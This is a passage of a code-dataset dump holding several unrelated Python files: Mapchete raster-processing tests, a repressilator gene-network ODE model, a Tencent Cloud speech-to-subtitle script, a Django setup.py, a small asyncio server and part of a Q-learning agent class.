-1:\n temp_s += s[j]\n# if j == len(s) - 1:\n# temp.append(temp_s)\n else:\n # temp.append(temp_s)\n break\n\n if len(temp_s) > max_len:\n max_len = len(temp_s)\n if max_len == len(s) - i:\n return max_len\n\n print(temp)\n return max_len\n\n\nif __name__ == '__main__':\n\n s = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'\n sol = Solution()\n length = sol.lengthOfLongestSubstring(s)\n print(length)\n pass\n","sub_path":"003-longest_substring_without_repeating/003_longest_substring_without_repeating[Time Limit Exceeded].py","file_name":"003_longest_substring_without_repeating[Time Limit Exceeded].py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"533898429","text":"#!/usr/bin/env python\n\"\"\"Test Mapchete main module and processing.\"\"\"\n\nimport os\nimport shutil\nimport yaml\nimport rasterio\nimport numpy as np\nimport numpy.ma as ma\nimport pkg_resources\nfrom cPickle import dumps\nfrom functools import partial\nfrom multiprocessing import Pool\n\nimport mapchete\nfrom mapchete.tile import BufferedTile\nfrom mapchete.io.raster import create_mosaic\nfrom mapchete.errors import MapcheteProcessOutputError\nfrom mapchete import _batch\n\nSCRIPTDIR = os.path.dirname(os.path.realpath(__file__))\nOUT_DIR = os.path.join(SCRIPTDIR, \"testdata/tmp\")\nTESTDATA_DIR = os.path.join(SCRIPTDIR, \"testdata\")\n\n\ndef test_empty_execute():\n \"\"\"Execute process outside of defined zoom levels.\"\"\"\n try:\n with mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_br.mapchete\")\n ) as mp:\n out_tile = mp.execute((6, 0, 0))\n assert out_tile.data.mask.all()\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_read_existing_output():\n \"\"\"Read existing process output.\"\"\"\n try:\n with mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_tl.mapchete\")\n ) as mp:\n tile = (5, 0, 0)\n # process and save\n mp.write(mp.get_raw_output(tile))\n # read written data\n out_tile = mp.read(tile)\n assert not out_tile.data.mask.all()\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_get_raw_output_outside():\n \"\"\"Get raw process output outside of zoom levels.\"\"\"\n try:\n with mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_br.mapchete\")\n ) as mp:\n out_tile = mp.get_raw_output((6, 0, 0))\n assert out_tile.data.mask.all()\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_get_raw_output_memory():\n \"\"\"Get raw process output using memory flag.\"\"\"\n try:\n with mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_tl.mapchete\"),\n mode=\"memory\"\n ) as mp:\n assert mp.config.mode == \"memory\"\n out_tile = mp.get_raw_output((5, 0, 0))\n assert not out_tile.data.mask.all()\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_get_raw_output_readonly():\n \"\"\"Get raw process output using readonly flag.\"\"\"\n try:\n tile = (5, 0, 0)\n readonly_mp = mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_tl.mapchete\"),\n mode=\"readonly\")\n write_mp = mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_tl.mapchete\"),\n mode=\"continue\")\n\n # read non-existing data (returns empty)\n out_tile = readonly_mp.get_raw_output(tile)\n assert out_tile.data.mask.all()\n\n # try to process and save empty data\n try: # TODO\n readonly_mp.write(readonly_mp.get_raw_output(tile))\n raise Exception()\n except ValueError:\n pass\n\n # actually process and save\n write_mp.write(write_mp.get_raw_output(tile))\n\n # read written output\n out_tile = readonly_mp.get_raw_output(tile)\n assert not out_tile.data.mask.all()\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_get_raw_output_continue():\n \"\"\"Get raw process output using memory flag.\"\"\"\n try:\n mp = mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_tl.mapchete\"))\n assert mp.config.mode == \"continue\"\n tile = (5, 0, 0)\n # process and save\n mp.write(mp.get_raw_output(tile))\n # read written data\n out_tile = mp.get_raw_output(tile)\n assert not out_tile.data.mask.all()\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_get_raw_output_reproject():\n \"\"\"Get process output from a different CRS.\"\"\"\n try:\n mp = mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_tl.mapchete\"))\n assert mp.config.mode == \"continue\"\n # TODO implement function\n mp.get_raw_output((5, 0, 0))\n except NotImplementedError:\n pass\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_baselevels():\n \"\"\"Baselevel interpolation.\"\"\"\n try:\n mp = mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/baselevels.mapchete\"),\n mode=\"continue\"\n )\n # process data before getting baselevels\n mp.batch_process(quiet=True)\n\n # get tile from lower zoom level\n for t in mp.get_process_tiles(4):\n tile = mp.get_raw_output(t)\n assert not tile.data.mask.all()\n # write for next zoom level\n mp.write(tile)\n assert not mp.get_raw_output(tile.get_parent()).data.mask.all()\n\n # get tile from higher zoom level\n tile = mp.get_process_tiles(6).next()\n # process and save\n output = mp.get_raw_output(tile)\n mp.write(output)\n # read from baselevel\n assert any([\n not mp.get_raw_output(upper_tile).data.mask.all()\n for upper_tile in tile.get_children()\n ])\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_baselevels_buffer():\n \"\"\"Baselevel interpolation using buffers.\"\"\"\n try:\n with open(\n os.path.join(SCRIPTDIR, \"testdata/baselevels.mapchete\"), \"r\"\n ) as src:\n config = yaml.load(src.read())\n config.update(\n pixelbuffer=10, config_dir=os.path.join(SCRIPTDIR, \"testdata\")\n )\n mp = mapchete.open(config, mode=\"continue\")\n # get tile from lower zoom level\n lower_tile = mp.get_process_tiles(4).next()\n # process and save\n for tile in lower_tile.get_children():\n output = mp.get_raw_output(tile)\n mp.write(output)\n # read from baselevel\n out_tile = mp.get_raw_output(lower_tile)\n assert not out_tile.data.mask.all()\n\n # get tile from higher zoom level\n tile = mp.get_process_tiles(6).next()\n # process and save\n output = mp.get_raw_output(tile)\n mp.write(output)\n # read from baselevel\n assert any([\n not mp.get_raw_output(upper_tile).data.mask.all()\n for upper_tile in tile.get_children()\n ])\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_baselevels_buffer_antimeridian():\n \"\"\"Baselevel interpolation using buffers.\"\"\"\n try:\n mp_config = yaml.load(open(\n os.path.join(SCRIPTDIR, \"testdata/baselevels.mapchete\"),\n \"r\").read()\n )\n mp_config.update(\n pixelbuffer=10, config_dir=os.path.join(SCRIPTDIR, \"testdata\"),\n input_files=None\n )\n zoom = 5\n row = 0\n with mapchete.open(mp_config) as mp:\n # write data left and right of antimeridian\n west = mp.config.process_pyramid.tile(zoom, row, 0)\n shape = (3, ) + west.shape\n west.data = np.ones(shape) * 0\n mp.write(west)\n east = mp.config.process_pyramid.tile(\n zoom, row, mp.config.process_pyramid.matrix_width(zoom) - 1\n )\n east.data = np.ones(shape) * 10\n mp.write(east)\n # use baselevel generation to interpolate tile and somehow\n # assert no data from across the antimeridian is read.\n lower_tile = mp.get_raw_output(west.get_parent())\n assert np.where(lower_tile.data.data != 10, True, False).all()\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_processing():\n \"\"\"Test correct processing (read and write) outputs.\"\"\"\n for cleantopo_process in [\n \"testdata/cleantopo_tl.mapchete\", \"testdata/cleantopo_br.mapchete\"\n ]:\n mp = mapchete.open(os.path.join(SCRIPTDIR, cleantopo_process))\n for zoom in range(6):\n tiles = []\n for tile in mp.get_process_tiles(zoom):\n output = mp.execute(tile)\n tiles.append(output)\n assert isinstance(output, BufferedTile)\n assert isinstance(output.data, ma.MaskedArray)\n assert output.data.shape == output.shape\n assert not ma.all(output.data.mask)\n mp.write(output)\n mosaic, mosaic_affine = create_mosaic(tiles)\n try:\n temp_vrt = os.path.join(OUT_DIR, str(zoom)+\".vrt\")\n gdalbuildvrt = \"gdalbuildvrt %s %s/%s/*/*.tif > /dev/null\" % (\n temp_vrt, OUT_DIR, zoom)\n os.system(gdalbuildvrt)\n with rasterio.open(temp_vrt, \"r\") as testfile:\n for file_item, mosaic_item in zip(\n testfile.meta[\"transform\"], mosaic_affine\n ):\n assert file_item == mosaic_item\n band = testfile.read(1, masked=True)\n assert band.shape == mosaic.shape\n assert ma.allclose(band, mosaic)\n assert ma.allclose(band.mask, mosaic.mask)\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_processing_as_function():\n \"\"\"Test correct processing using execute function().\"\"\"\n for cleantopo_process in [\n \"testdata/cleantopo_tl.mapchete\", \"testdata/cleantopo_br.mapchete\"\n ]:\n mp_config = yaml.load(\n open(os.path.join(SCRIPTDIR, cleantopo_process)).read()\n )\n mp_config.update(\n process_file=\"../example_process_as_function.py\",\n config_dir=TESTDATA_DIR\n )\n mp = mapchete.open(mp_config)\n for zoom in range(6):\n tiles = []\n for tile in mp.get_process_tiles(zoom):\n output = mp.execute(tile)\n tiles.append(output)\n assert isinstance(output, BufferedTile)\n assert isinstance(output.data, ma.MaskedArray)\n assert output.data.shape == output.shape\n assert not ma.all(output.data.mask)\n mp.write(output)\n mosaic, mosaic_affine = create_mosaic(tiles)\n try:\n temp_vrt = os.path.join(OUT_DIR, str(zoom)+\".vrt\")\n gdalbuildvrt = \"gdalbuildvrt %s %s/%s/*/*.tif > /dev/null\" % (\n temp_vrt, OUT_DIR, zoom)\n os.system(gdalbuildvrt)\n with rasterio.open(temp_vrt, \"r\") as testfile:\n for file_item, mosaic_item in zip(\n testfile.meta[\"transform\"], mosaic_affine\n ):\n assert file_item == mosaic_item\n band = testfile.read(1, masked=True)\n assert band.shape == mosaic.shape\n assert ma.allclose(band, mosaic)\n assert ma.allclose(band.mask, mosaic.mask)\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_multiprocessing():\n \"\"\"Test parallel tile processing.\"\"\"\n mp = mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_tl.mapchete\"))\n assert dumps(mp)\n assert dumps(mp.config)\n assert dumps(mp.config.output)\n for tile in mp.get_process_tiles():\n assert dumps(tile)\n f = partial(_worker, mp)\n try:\n pool = Pool()\n for zoom in reversed(mp.config.zoom_levels):\n for raw_output in pool.imap_unordered(\n f, mp.get_process_tiles(zoom), chunksize=8\n ):\n mp.write(raw_output)\n except KeyboardInterrupt:\n pool.terminate()\n finally:\n pool.close()\n pool.join()\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef _worker(mp, tile):\n \"\"\"Multiprocessing worker processing a tile.\"\"\"\n return mp.execute(tile)\n\n\ndef test_write_empty():\n \"\"\"Test write function when passing an empty process_tile.\"\"\"\n mp = mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_tl.mapchete\"))\n # process and save\n mp.write(mp.config.process_pyramid.tile(5, 0, 0))\n\n\ndef test_process_template():\n \"\"\"Template used to create an empty process.\"\"\"\n process_template = pkg_resources.resource_filename(\n \"mapchete.static\", \"process_template.py\")\n dummy1 = os.path.join(TESTDATA_DIR, \"dummy1.tif\")\n mp = mapchete.open(\n dict(\n process_file=process_template,\n input_files=dict(file1=dummy1),\n output=dict(\n format=\"GTiff\",\n path=\".\",\n type=\"geodetic\",\n bands=1,\n dtype=\"uint8\"\n ),\n config_dir=\".\",\n process_zoom=4\n ))\n process_tile = mp.get_process_tiles(zoom=4).next()\n # Mapchete throws a RuntimeError if process output is empty\n try:\n mp.execute(process_tile)\n raise Exception()\n except MapcheteProcessOutputError:\n pass\n\n\ndef test_count_tiles():\n \"\"\"Count tiles function.\"\"\"\n maxzoom = 13\n mp_conf = yaml.load(open(\n os.path.join(SCRIPTDIR, \"testdata/zoom.mapchete\"), \"r\").read()\n )\n del mp_conf[\"process_zoom\"]\n mp_conf.update(\n process_maxzoom=maxzoom,\n process_bounds=[14.0625, 47.8125, 16.875, 50.625],\n config_dir=TESTDATA_DIR, input_files=None, metatiling=8, pixelbuffer=5\n )\n # for minzoom in range(0, 14):\n for minzoom in range(0, 14):\n mp_conf.update(process_minzoom=minzoom)\n with mapchete.open(mp_conf) as mp:\n assert len(list(mp.get_process_tiles())) == _batch.count_tiles(\n mp.config.process_area(), mp.config.process_pyramid, minzoom,\n maxzoom\n )\n\n\ndef test_batch_process():\n \"\"\"Test batch_process function.\"\"\"\n mp = mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_tl.mapchete\"))\n try:\n # invalid parameters errors\n try:\n mp.batch_process(zoom=1, tile=(1, 0, 0))\n raise Exception()\n except ValueError:\n pass\n try:\n mp.batch_process(debug=True, quiet=True)\n raise Exception()\n except ValueError:\n pass\n # process single tile\n mp.batch_process(tile=(2, 0, 0))\n mp.batch_process(tile=(2, 0, 0), quiet=True)\n mp.batch_process(tile=(2, 0, 0), debug=True)\n # process using multiprocessing\n mp.batch_process(zoom=2, multi=2)\n # process without multiprocessing\n mp.batch_process(zoom=2, multi=1)\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n","sub_path":"test/test_mapchete.py","file_name":"test_mapchete.py","file_ext":"py","file_size_in_byte":14740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"640761048","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import odeint\nimport math\nimport sys\n\nprint(sys.argv)\n\ndef sdot(s,t,param):\n\n (p_LacI, p_TetR, p_CI, m_LacI, m_TetR, m_CI, m_GFP, p_GFP)=s\n (k_m, k_m0, k_p, k_dm, k_dp, K, n, k_dGFP, IPTG)=param\n\n rate_m_LacI_prod = k_m*K**n / (K**n + p_CI**n) + k_m0\n if IPTG_method == 'None':\n rate_m_TetR_prod = k_m*K**n / (K**n + p_LacI**n) + k_m0\n if IPTG_method == 'multiply':\n rate_m_TetR_prod = k_m*K**n / (K**n + p_LacI**n) * K**n/(K**n + IPTG) + k_m0\n if IPTG_method == 'add':\n rate_m_TetR_prod = k_m*K**n / (K**n + (p_LacI + IPTG)**n) + k_m0\n rate_m_CI_prod = k_m*K**n / (K**n + p_TetR**n) + k_m0\n rate_m_GFP_prod = 0\n\n rate_p_LacI_prod = k_p*m_LacI\n rate_p_TetR_prod = k_p*m_TetR\n rate_p_CI_prod = k_p*m_CI\n rate_p_GFP_prod = 0\n\n rate_m_LacI_loss = k_dm*m_LacI\n rate_m_TetR_loss = k_dm*m_TetR\n rate_m_CI_loss = k_dm*m_CI\n rate_m_GFP_loss = 0\n\n rate_p_LacI_loss = k_dp*p_LacI\n rate_p_TetR_loss = k_dp*p_TetR\n rate_p_CI_loss = k_dp*p_CI\n rate_p_GFP_loss = 0\n\n dp_LacI = rate_p_LacI_prod - rate_p_LacI_loss\n dp_TetR = rate_p_TetR_prod - rate_p_TetR_loss\n dp_CI = rate_p_CI_prod - rate_p_CI_loss\n dp_GFP = rate_p_GFP_prod - rate_p_GFP_loss\n\n\n dm_LacI = rate_m_LacI_prod - rate_m_LacI_loss\n dm_TetR = rate_m_TetR_prod - rate_m_TetR_loss\n dm_CI = rate_m_CI_prod - rate_m_CI_loss\n dm_GFP = rate_m_GFP_prod - rate_m_GFP_loss\n\n sdot = (dp_LacI, dp_TetR, dp_CI, dm_LacI, dm_TetR, dm_CI, dm_GFP, dp_GFP)\n return sdot\n\n# DEFINE INITIAL CONDITIONS AND PARAMETERS\n\n#intitial condtions\np_LacI=0\np_TetR=0\np_CI=0\np_GFP=0\n\nm_LacI=5\nm_TetR=0\nm_CI=0\nm_GFP=0\n\ns = (p_LacI, p_TetR, p_CI, m_LacI, m_TetR, m_CI)\n\nk_m=0.5\nk_m0=5e-4\n\nK=40.0\nn=2.1\n\nk_dm=0.00577622650467\nk_dp=0.00144405662617\nk_dGFP=0.000128360588993\nk_p=0.115524530093\n#IPTG=0.1;\n\ns0 = (p_LacI, p_TetR, p_CI, m_LacI, m_TetR, m_CI, m_GFP, p_GFP)\nparam = (k_m, k_m0, k_p, k_dm, k_dp, K, n, k_dGFP, IPTG)\n\nt_max=1000.*60.\nt_obs=np.linspace(0,t_max,t_max+1)\ns_obs=odeint(sdot,s0,t_obs,args=(param,))\n\np_LacI_obs = s_obs[:,0]\np_TetR_obs = s_obs[:,1]\np_CI_obs = s_obs[:,2]\nm_LacI_obs = s_obs[:,3]\nm_TetR_obs = s_obs[:,4]\nm_CI_obs = s_obs[:,5]\nm_GFP_obs = s_obs[:,6]\np_GFP_obs = s_obs[:,7]\n","sub_path":"tst3/repressilator.py","file_name":"repressilator.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"352857073","text":"# -*- coding: utf-8 -*-\r\nfrom tencentcloud.common import credential\r\nfrom tencentcloud.common.profile.client_profile import ClientProfile\r\nfrom tencentcloud.common.profile.http_profile import HttpProfile\r\nfrom tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException\r\nfrom tencentcloud.asr.v20190614 import asr_client, models\r\n\r\nfrom sys import argv\r\n\r\nimport base64\r\nimport json\r\nimport re\r\nimport jieba\r\n\r\njieba.enable_paddle()\r\n\r\nID = \"\"\r\nKEY = \"\"\r\n\r\n\r\nclass audio2text(object):\r\n\r\n def __init__(self):\r\n self.cred = credential.Credential(ID, KEY)\r\n self.httpProfile = HttpProfile()\r\n self.httpProfile.endpoint = \"asr.tencentcloudapi.com\"\r\n\r\n self.clientProfile = ClientProfile()\r\n self.clientProfile.httpProfile = self.httpProfile\r\n self.clientProfile.signMethod = \"TC3-HMAC-SHA256\" # 签名方法v3\r\n self.client = asr_client.AsrClient(self.cred, \"\", self.clientProfile)\r\n\r\n # 发送请求\r\n def a2t(self, audioFilePath):\r\n try:\r\n # 读取文件以及转base64\r\n audioFile = open(audioFilePath, mode='rb')\r\n data = audioFile.read()\r\n dataLen = len(data)\r\n base64Data = base64.b64encode(data).decode()\r\n\r\n req = models.CreateRecTaskRequest()\r\n params = {\"EngineModelType\": \"16k_zh_video\", \"ChannelNum\": 1, \"ResTextFormat\": 0, \"SourceType\": 1,\r\n \"Data\": base64Data, \"DataLen\": dataLen}\r\n req._deserialize(params)\r\n resp = self.client.CreateRecTask(req)\r\n resp = resp.to_json_string() # 转换为json格式\r\n\r\n resp = json.loads(resp) # 转换为字典,以便提取TaskId\r\n taskId = resp[\"Data\"][\"TaskId\"]\r\n\r\n return taskId\r\n\r\n except TencentCloudSDKException as err:\r\n print(err)\r\n\r\n # 查询结果\r\n def getText(self, taskId):\r\n try:\r\n req = models.DescribeTaskStatusRequest()\r\n params = '{\"TaskId\":' + str(taskId) + '}'\r\n req.from_json_string(params)\r\n\r\n resp = self.client.DescribeTaskStatus(req)\r\n # print(resp.to_json_string())\r\n\r\n return resp.to_json_string()\r\n\r\n except TencentCloudSDKException as err:\r\n print(err)\r\n\r\n\r\ndef formattime2time(ft):\r\n hh, mm, ss, xxx = re.split(':|,', ft)\r\n t = int(xxx) + int(ss) * 1000 + int(mm) * \\\r\n 1000 * 60 + int(hh) * 1000 * 60 * 60\r\n return t\r\n\r\n\r\ndef time2formattime(t):\r\n xxx = t % 1000\r\n t -= xxx\r\n ss = t % (1000 * 60)\r\n t -= ss\r\n mm = t % (1000 * 60 * 60)\r\n t -= mm\r\n hh = t % (1000 * 60 * 60 * 60)\r\n return \"%02d:%02d:%02d,%03d\" % (int(hh / (1000 * 60 * 60)), int(mm / (1000 * 60)), int(ss / 1000), xxx)\r\n\r\n# 将时间转为hh:mm:ss格式\r\ndef transToTime(strTime):\r\n time = strTime.split(\":\")\r\n hh = int(time[0]) if len(time) == 3 else 0\r\n mm = int(time[1]) if len(time) == 3 else (\r\n int(time[0]) if len(time) == 2 else 0)\r\n _ss = time[len(time) - 1].split(\".\")\r\n ss = int(_ss[0])\r\n ms = int(_ss[1])\r\n return \"%02d:%02d:%02d,%03d\" % (hh, mm, ss, ms)\r\n\r\n\r\n# 根据音频得到识别结果,处理并输出srt格式的中文字幕\r\ndef getZhSubtitle(audioPath, zhFilePath):\r\n # 发送识别请求\r\n testA2T = audio2text()\r\n myTaskId = testA2T.a2t(audioPath)\r\n myResult = ''\r\n cnt = 0\r\n # 查询识别结果\r\n while 1:\r\n if ++cnt % 1000000000 == 0:\r\n myText = json.loads(testA2T.getText(myTaskId))\r\n myStatus = myText[\"Data\"][\"Status\"]\r\n if myStatus == 2:\r\n myResult = myText[\"Data\"][\"Result\"]\r\n break\r\n\r\n res = myResult.split(\"\\n\")\r\n res.pop()\r\n # 按srt格式写入文档\r\n with open(zhFilePath, 'w+', encoding='utf-8') as newFile:\r\n step = 1\r\n for i in range(len(res)):\r\n temp = res[i].split(' ')\r\n t = temp[0][1:len(temp[0]) - 1].split(',')\r\n begin = transToTime(t[0])\r\n end = transToTime(t[1])\r\n text = temp[1]\r\n\r\n cnt = len(text)\r\n texts = text.split(',')\r\n cur_text = texts[0]\r\n btime = formattime2time(begin)\r\n etime = formattime2time(end)\r\n diff = etime - btime\r\n sig_step = int(diff / cnt)\r\n cur_time = int(len(cur_text) * diff / cnt) + sig_step\r\n for j in range(1, len(texts)):\r\n if len(cur_text) + len(texts[j]) <= 24:\r\n cur_text += \",\" + texts[j]\r\n cur_time += int(len(texts[j]) * diff / cnt) + sig_step\r\n else:\r\n if len(cur_text.split(',')) == 1 and len(cur_text) > 24:\r\n num = len(cur_text)\r\n words = list(jieba.cut(cur_text, use_paddle=True))\r\n cur_text = words[0]\r\n word_time = int(len(cur_text) * cur_time / num)\r\n for k in range(1, len(words)):\r\n if len(cur_text) + len(words[k]) <= 24:\r\n cur_text += words[k]\r\n word_time += int(len(words[k]) * cur_time / num)\r\n else:\r\n newFile.write(str(step) + '\\n')\r\n step += 1\r\n newFile.write(time2formattime(btime) + ' --> ' + time2formattime(btime + word_time) + '\\n')\r\n btime += word_time\r\n newFile.write(cur_text + '\\n\\n')\r\n cur_text = words[k]\r\n word_time = int(len(words[k]) * cur_time / num)\r\n else:\r\n newFile.write(str(step) + '\\n')\r\n step += 1\r\n newFile.write(time2formattime(btime) + ' --> ' + time2formattime(btime + cur_time) + '\\n')\r\n btime += cur_time\r\n newFile.write(cur_text + '\\n\\n')\r\n cur_text = texts[j]\r\n cur_time = int(len(texts[j]) * diff / cnt) + sig_step\r\n if len(cur_text.split(','))== 1 and len(cur_text) > 24:\r\n cnt = len(cur_text)\r\n words = list(jieba.cut(cur_text, use_paddle=True))\r\n cur_text = words[0]\r\n diff = etime - btime\r\n cur_time = int(len(cur_text) * diff / cnt)\r\n for j in range(1, len(words)):\r\n if len(cur_text) + len(words[j]) <= 24:\r\n cur_text += words[j]\r\n cur_time += int(len(words[j]) * diff / cnt)\r\n else:\r\n newFile.write(str(step) + '\\n')\r\n step += 1\r\n newFile.write(time2formattime(btime) + ' --> ' + time2formattime(btime + cur_time) + '\\n')\r\n btime += cur_time\r\n newFile.write(cur_text + '\\n\\n')\r\n cur_text = words[j]\r\n cur_time = int(len(words[j]) * diff / cnt)\r\n newFile.write(str(step) + '\\n')\r\n step += 1\r\n newFile.write(time2formattime(btime) + ' --> ' + end + '\\n')\r\n newFile.write(cur_text)\r\n newFile.write('\\n\\n')\r\n else:\r\n newFile.write(str(step) + '\\n')\r\n step += 1\r\n newFile.write(time2formattime(btime) + ' --> ' + end + '\\n')\r\n newFile.write(cur_text)\r\n newFile.write('\\n\\n')\r\n newFile.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n audioPath = argv[1] # 音频路径\r\n zhFilePath = argv[2] # 中文字幕\r\n getZhSubtitle(audioPath, zhFilePath)\r\n","sub_path":"src/main/resources/python/audio2zhSubtitle_words.py","file_name":"audio2zhSubtitle_words.py","file_ext":"py","file_size_in_byte":7888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"35575409","text":"#!/usr/bin/env python\n#\n# Copyright (c) 2008 Joost Cassee\n# Licensed under the terms of the MIT License (see LICENSE.txt)\n\nfrom setuptools import setup\nimport metadata\n\napp_name = metadata.name\nversion = metadata.version\n\nlong_description = open('docs/index.rst').read().split('split here', 1)[0] \n\nsetup(\n name = \"django-%s\" % app_name,\n version = version,\n\n packages = [app_name],\n\n author = \"Philip Roche\",\n author_email = \"phil.roche@ticket-text.com\",\n maintainer = \"Philip Roche\",\n maintainer_email = \"phil.roche@ticket-text.com\",\n description = \"This Django application you to prepend a string to your django app urls useful if you need to change themes based on url.\",\n long_description = long_description,\n license = \"MIT License\",\n keywords = \"django url\",\n classifiers = [\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Software Development :: Libraries :: Application Frameworks',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Internet :: WWW/HTTP :: WSGI :: Middleware',\n ],\n)\n","sub_path":"pypi_install_script/django-urlprepend-0.4.6.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"418876054","text":"import os\nos.environ['PYTHONASYNCIODEBUG'] = '1'\n\nimport asyncio\n\n\nasync def server_handler(reader, writer):\n request = await reader.readline()\n request = request.decode()\n print(request)\n await asyncio.sleep(1)\n\n response = request[:-1] + ' - is done!\\n'\n print(response)\n writer.write(response.encode())\n await writer.drain()\n writer.close()\n\n\nloop = asyncio.get_event_loop()\nserver = asyncio.start_server(server_handler, '127.0.0.1', 8123, loop=loop)\nloop.run_until_complete(server)\n\nprint('Start server on localhost:8123')\ntry:\n loop.run_forever()\nexcept KeyboardInterrupt:\n pass\n\nserver.close()\nloop.run_until_complete(server.waite_closed())\nloop.close()\n","sub_path":"asyncio/my_server.py","file_name":"my_server.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"1972101","text":"from __future__ import print_function, division\nimport numpy as np\nimport tensorflow as tf\nfrom configs import ReplayMemoryConfig\nfrom replay_memory import ReplayMemory\n\n\nclass BaseQAgent(object):\n \n def __init__(self, args):\n\n # problem parameters\n self.action_num = args.action_num # assume actions are 0 ... n-1\n self.network = args.network # might be several networks, written in one instance\n self.obs_dim = args.obs_dim # dimensionality of a single observation\n #self.max_reward = args.max_reward # currently not used\n #self.min_reward = args.min_reward\n self.ep = args.ep # epsilon greedy\n self.ep_start = self.ep\n self.ep_end = args.ep_end or self.ep\n self.ep_t = args.ep_t\n #print(self.ep_start, self.ep_end, self.ep_t)\n self.batch_size = args.batch_size\n \n # q learning parameters:\n self.discount = args.discount\n self.update_freq = args.update_freq\n self.learn_start = args.learn_start # when learning starts\n self.replay_memory = args.replay_memory # replay memory size\n self.hist_len = args.hist_len # how many observations to form a state\n self.alg_args = args.alg_args # args for specific type of agents\n \n # create replay memory for learning\n mem_args = ReplayMemoryConfig()\n mem_args.memory_size = self.replay_memory\n mem_args.obs_dim = self.obs_dim\n mem_args.hist_len = self.hist_len\n self.mem = ReplayMemory(mem_args)\n\n # replay memory for cross validation\n mem_args1 = ReplayMemoryConfig()\n mem_args1.memory_size = int(1e4)\n mem_args1.obs_dim = self.obs_dim\n mem_args1.hist_len = self.hist_len\n self.mem_cv = ReplayMemory(mem_args1)\n\n # create a seperate memory for testing\n mem_args2 = ReplayMemoryConfig()\n mem_args2.memory_size = self.hist_len * 2\n mem_args2.obs_dim = self.obs_dim\n mem_args2.hist_len = self.hist_len\n self.mem_test = ReplayMemory(mem_args2)\n # variables for learning:\n self.step_num = 0\n self.last_state = None\n self.last_state_test = None\n self.last_state_cv = None\n self.session = None\n #self.last_action = None\n\n self.mode = 'learn'\n self.mode_dict = ['learn', 'cv', 'test']\n\n def load_tf_session(self, sess):\n self.session = sess\n\n def set_mode(self, mode):\n assert (mode in self.mode_dict)\n self.mode = mode\n\n\n def actions_to_one_hot(self, a):\n # take nx1 actions and turn it into nxa vectors \n n = a.shape[0]\n one_hot = np.zeros((n, self.action_num))\n one_hot[np.arange(n), a] = 1\n return one_hot\n\n\n def get_next_action(self):\n if self.mode == 'learn':\n return self.get_next_action_e_greedy(self.last_state)\n if self.mode == 'test':\n return self.get_next_action_greedy(self.last_state_test)\n if self.mode == 'cv':\n return self.get_next_action_e_greedy(self.last_state_cv)\n \n def get_next_action_greedy(self, s):\n q = self.get_value_output(s)\n a = np.argmax(q)\n return a\n\n def get_next_action_e_greedy(self, s):\n # epsilon greedy\n self.ep = self.ep_start - (self.ep_start - self.ep_end) / self.ep_t * min(self.step_num, self.ep_t)\n tmp = np.random.uniform(0, 1)\n if tmp < self.ep:\n a = np.random.randint(self.action_num)\n #print(tmp, self.ep, a)\n else:\n a = self.get_next_action_greedy(s)\n return a\n\n def learn(self):\n pass\n\n def get_q_targets(self, r, s2, term):\n pass\n \n def get_value_output(self, s):\n # get q values/advantage values for each action given state s\n pass\n\n def observe_step(self, o, a, r, term):\n o = o.flatten()# ignore whatever the original form is?\n if self.mode == 'learn':\n self.mem.add(o, a, r, term)\n self.step_num += 1\n if self.step_num >= self.learn_start and\\\n (self.step_num % self.update_freq) == 0:\n self.learn()\n self.last_state = self.mem.get_recent_state()\n if self.mode == 'test':\n self.mem_test.add(o, a, r, term)\n 